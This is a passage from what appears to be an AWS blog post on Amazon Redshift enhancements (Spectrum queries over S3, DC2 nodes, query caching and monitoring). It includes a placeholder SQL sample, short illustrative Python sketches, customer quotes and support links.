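-- Hypothetical names throughout; substitute your own catalog, role, and bucket.
CREATE EXTERNAL SCHEMA spectrum_demo
FROM DATA CATALOG DATABASE 'demo_db'
IAM_ROLE 'arn:aws:iam::123456789012:role/RedshiftSpectrumRole';

-- The data stays in S3, in an open format (Parquet here); no load step.
CREATE EXTERNAL TABLE spectrum_demo.clicks (
    user_id    BIGINT,
    url        VARCHAR(2048),
    clicked_at TIMESTAMP
)
STORED AS PARQUET
LOCATION 's3://demo-bucket/clicks/';

-- Join S3-resident clickstream data with a local Redshift table.
SELECT u.plan, count(*) AS clicks
FROM spectrum_demo.clicks c
JOIN users u ON u.id = c.user_id
GROUP BY u.plan;
```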

“For complex queries, Redshift Spectrum provided a 67 percent performance gain,” said Rafi Ton, CEO, NUVIAD. “Using the Parquet data format, Redshift Spectrum delivered an 80 percent performance improvement. For us, this was substantial.”

To learn more about Redshift Spectrum, watch our AWS Summit session Intro to Amazon Redshift Spectrum: Now Query Exabytes of Data in S3, and read our announcement blog post Amazon Redshift Spectrum – Exabyte-Scale In-Place Queries of S3 Data.

DC2 nodes—twice the performance of DC1 at the same price

We launched second-generation Dense Compute (DC2) nodes to provide low latency and high throughput for demanding data warehousing workloads. DC2 nodes feature powerful Intel E5-2686 v4 (Broadwell) CPUs, fast DDR4 memory, and NVMe-based solid state disks (SSDs). We’ve tuned Amazon Redshift to take advantage of the better CPU, network, and disk on DC2 nodes, providing up to twice the performance of DC1 at the same price. Our DC2.8xlarge instances now provide twice the memory per slice of data and an optimized storage layout with 30 percent better storage utilization.

“Redshift allows us to quickly spin up clusters and provide our data scientists with a fast and easy method to access data and generate insights,” said Bradley Todd, technology architect at Liberty Mutual. “We saw a 9x reduction in month-end reporting time with Redshift DC2 nodes as compared to DC1.”

Read our customer testimonials to see the performance gains our customers are experiencing with DC2 nodes. To learn more, read our blog post Amazon Redshift Dense Compute (DC2) Nodes Deliver Twice the Performance as DC1 at the Same Price.

Performance enhancements—3x to 5x faster queries

On average, our customers are seeing 3x to 5x performance gains for most of their critical workloads.

We introduced short query acceleration to speed up execution of queries such as reports, dashboards, and interactive analysis. Short query acceleration uses machine learning to predict the execution time of a query, and to move short running queries to an express short query queue for faster processing.
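The routing idea behind short query acceleration can be sketched in a few lines. This is a toy model, not Redshift's implementation: the predictor, threshold, and queue names are all invented for illustration.

```python
# Sketch of short query acceleration (SQA): a predictor estimates a query's
# runtime, and queries predicted to be short go to an express queue instead
# of the main WLM queues. The heuristic below is a toy stand-in for the
# machine-learning model the service actually uses.

def predict_runtime_seconds(query: str) -> float:
    """Toy predictor: guess runtime from the query's shape."""
    q = query.lower()
    estimate = 1.0
    if "join" in q:
        estimate += 30.0      # joins tend to run longer
    if "group by" in q:
        estimate += 10.0      # aggregations add work
    return estimate

def route(query: str, sqa_threshold: float = 5.0) -> str:
    """Send predicted-short queries to the express queue."""
    if predict_runtime_seconds(query) <= sqa_threshold:
        return "express_queue"
    return "main_queue"

print(route("SELECT count(*) FROM events"))                       # short query
print(route("SELECT * FROM a JOIN b ON a.id = b.id GROUP BY 1"))  # long query
```

The design point is that a mispredicted long query can be demoted later, so a cheap up-front estimate is enough to keep dashboards and interactive queries from waiting behind batch work.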

We launched results caching to deliver sub-second response times for queries that are repeated, such as dashboards, visualizations, and those from BI tools. Results caching has an added benefit of freeing up resources to improve the performance of all other queries.
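A minimal sketch of the result-caching idea, under the assumption of a hypothetical query runner (`execute`); this is not Redshift's code, just the shape of the optimization:

```python
# Repeated identical queries return the cached result instead of
# re-executing, which frees compute for other queries.

class CachingExecutor:
    def __init__(self, execute):
        self._execute = execute   # underlying (expensive) query runner
        self._cache = {}          # query text -> cached result
        self.executions = 0       # how many queries actually ran

    def run(self, query: str):
        if query not in self._cache:
            self._cache[query] = self._execute(query)
            self.executions += 1  # cache miss: real work happened
        return self._cache[query]  # cache hit: near-instant response

executor = CachingExecutor(lambda q: f"result of {q}")
executor.run("SELECT region, sum(sales) FROM orders GROUP BY region")
executor.run("SELECT region, sum(sales) FROM orders GROUP BY region")
assert executor.executions == 1   # second call served from cache
```

The real engine also invalidates cached results when the underlying data changes; this sketch omits invalidation entirely.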

We also introduced late materialization to reduce the amount of data scanned for queries with predicate filters by batching and factoring in the filtering of predicates before fetching data blocks in the next column. For example, if only 10 percent of the table rows satisfy the predicate filters, Amazon Redshift can potentially save 90 percent of the I/O for the remaining columns to improve query performance.
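The I/O saving can be illustrated with plain Python lists standing in for column data (Redshift of course operates on compressed column blocks, not lists): evaluate the predicate on its own column first, then touch the remaining columns only for the rows that passed.

```python
# Late materialization sketch: filter on the predicate column first,
# then fetch the other columns only for matching row positions.

def late_materialize(predicate, filter_col, other_cols):
    """Return matching rows, reading other columns only at match positions."""
    matching = [i for i, v in enumerate(filter_col) if predicate(v)]
    # Only len(matching)/len(filter_col) of each remaining column is read.
    return [
        (filter_col[i],) + tuple(col[i] for col in other_cols)
        for i in matching
    ]

status = ["open", "closed", "open", "closed", "closed"]
amount = [10, 20, 30, 40, 50]
region = ["eu", "us", "eu", "us", "eu"]

rows = late_materialize(lambda s: s == "open", status, [amount, region])
print(rows)  # [('open', 10, 'eu'), ('open', 30, 'eu')]
```

Here only 2 of 5 positions in `amount` and `region` are touched, mirroring the 10-percent-selectivity example above.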

We launched query monitoring rules and pre-defined rule templates. These features make it easier for you to set metrics-based performance boundaries for workload management (WLM) queries, and specify what action to take when a query goes beyond those boundaries. For example, for a queue that’s dedicated to short-running queries, you might create a rule that aborts queries that run for more than 60 seconds. To track poorly designed queries, you might have another rule that logs queries that contain nested loops.
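The two example rules above can be sketched as predicate/action pairs evaluated against a query's runtime metrics. The metric names and actions here are illustrative, not Redshift's exact rule schema.

```python
# Sketch of metrics-based query monitoring rules: each rule pairs a
# condition over query metrics with an action (abort, log, etc.).

RULES = [
    {"name": "abort_long_in_short_queue",
     "when": lambda m: m["elapsed_seconds"] > 60,
     "action": "abort"},
    {"name": "log_nested_loops",
     "when": lambda m: m["nested_loop_joins"] > 0,
     "action": "log"},
]

def evaluate(metrics: dict) -> list:
    """Return the actions triggered by a query's runtime metrics."""
    return [rule["action"] for rule in RULES if rule["when"](metrics)]

print(evaluate({"elapsed_seconds": 75, "nested_loop_joins": 0}))  # ['abort']
print(evaluate({"elapsed_seconds": 5, "nested_loop_joins": 2}))   # ['log']
```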

Customer insights

Amazon Redshift and Redshift Spectrum serve customers across a variety of industries and sizes, from startups to large enterprises. Visit our customer page to see the success that customers are having with our recent enhancements. Learn how companies like Liberty Mutual Insurance saw a 9x reduction in month-end reporting time using DC2 nodes. On this page, you can find case studies, videos, and other content that show how our customers are using Amazon Redshift to drive innovation and business results.

In addition, check out these resources to learn about the success our customers are having building out a data warehouse and data lake integration solution with Amazon Redshift:

Partner solutions

You can enhance your Amazon Redshift data warehouse by working with industry-leading experts. Our AWS Partner Network (APN) Partners have certified their solutions to work with Amazon Redshift. They offer software, tools, integration, and consulting services to help you at every step. Visit our Amazon Redshift Partner page and choose an APN Partner. Or, use AWS Marketplace to find and immediately start using third-party software.

To see what our Partners are saying about Amazon Redshift Spectrum and our DC2 nodes mentioned earlier, read these blog posts:


Blog posts

Visit the AWS Big Data Blog for a list of all Amazon Redshift articles.

YouTube videos


Our community of experts contributes on GitHub to provide tips and hints that can help you get the most out of your deployment. Visit GitHub frequently to get the latest technical guidance, code samples, administrative task automation utilities, the analyze & vacuum schema utility, and more.

Customer support

If you are evaluating or considering a proof of concept with Amazon Redshift, or you need assistance migrating your on-premises or other cloud-based data warehouse to Amazon Redshift, our team of product experts and solutions architects can help you with architecting, sizing, and optimizing your data warehouse. Contact us using this support request form, and let us know how we can assist you.

If you are an Amazon Redshift customer, we offer a no-cost health check program. Our team of database engineers and solutions architects give you recommendations for optimizing Amazon Redshift and Amazon Redshift Spectrum for your specific workloads. To learn more, email us at [email protected].

If you have any questions, email us at [email protected].


Additional Reading

If you found this post useful, be sure to check out Amazon Redshift Spectrum – Exabyte-Scale In-Place Queries of S3 Data, Using Amazon Redshift for Fast Analytical Reports, and How to Migrate Your Oracle Data Warehouse to Amazon Redshift Using AWS SCT and AWS DMS.

About the Author

Larry Heathcote is a Principal Product Marketing Manager at Amazon Web Services for data warehousing and analytics. Larry is passionate about seeing the results of data-driven insights on business outcomes. He enjoys family time, home projects, grilling out and the taste of classic barbeque.